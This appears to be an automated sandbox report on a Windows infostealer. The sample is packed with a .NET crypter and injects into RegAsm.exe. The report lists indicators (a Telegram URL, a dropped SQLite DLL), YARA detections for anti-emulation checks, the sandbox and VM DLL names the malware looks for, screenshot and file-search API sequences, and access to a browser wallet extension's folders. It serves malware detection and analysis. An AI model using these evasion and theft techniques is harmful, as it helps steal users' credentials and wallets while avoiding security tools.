                  Source: HDBKJE.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: HDBKJE.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/r1g1o
                  Source: file.exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: IEHJJE.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: IEHJJE.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknown HTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 1_2_004102E8 _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_004102E8

                  System Summary

                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: file.exeStatic PE information: invalid certificate
                  Source: file.exe, 00000000.00000002.1630251507.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                  Source: file.exe, 00000000.00000000.1628616143.00000000009F8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNETCrypt.exe4 vs file.exe
                  Source: file.exeBinary or memory string: OriginalFilenameNETCrypt.exe4 vs file.exe
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3d65570.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.3d65570.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F310 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_0040F310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F711 CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,1_2_0040F711
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: KFIJEG.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: file.exeReversingLabs: Detection: 63%
                  Source: file.exeVirustotal: Detection: 42%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: NETCrypt.pdb source: file.exe
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.dr

                  Data Obfuscation

                  Source: file.exe, gBMthepoZSL1ZVKpeA.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00416676 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416676
                  Source: sqlx[1].dll.1.drStatic PE information: section name: .00cfg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00418205 push ecx; ret 1_2_00418218
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B491BF9 push ecx; ret 1_2_1B634C03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1B4910C8 push ecx; ret 1_2_1B693552
                  Source: file.exeStatic PE information: section name: .text entropy: 7.421157543801175
                  Source: file.exe, eRtoUikQAUlfmrcXhP.csHigh entropy of concatenated method names: 'WKIpT6WRYP', 'GxIp0d0vl2', 'R3Ppdmg34A', 'iAsp1JjQqZ', 'yQwppAuByG', 'BT0pvkDekn', 'ENbpFei3CE', 'YlPUn7XuQH', 'Qsnpc1Onv9', 'jAdpZCXbre'
                  Source: file.exe, gBMthepoZSL1ZVKpeA.csHigh entropy of concatenated method names: 'reTlcDMFua', 'nW4lBacjpc', 'sMLlkdoJ60', 'I5LlJVOMeQ', 'qdll7OAZFb', 'QEmlZSRGOw', 'RegMCu0N1R', 'N15X2cY3J', 'NWNp5BRFs', 'Q59l6jZOT'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5816, type: MEMORYSTR
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exe TID: 2196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040ECD4 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040EDE7h1_2_0040ECD4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B700 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041531B _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_0041531B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414462 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00414462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409531 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040994C _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040994C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414B2E _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414ED2 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00414ED2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409FBE _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004148AF _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_004148AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040EE70 GetSystemInfo,wsprintfA,1_2_0040EE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: RegAsm.exe, 00000001.00000002.2881580352.00000000031A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
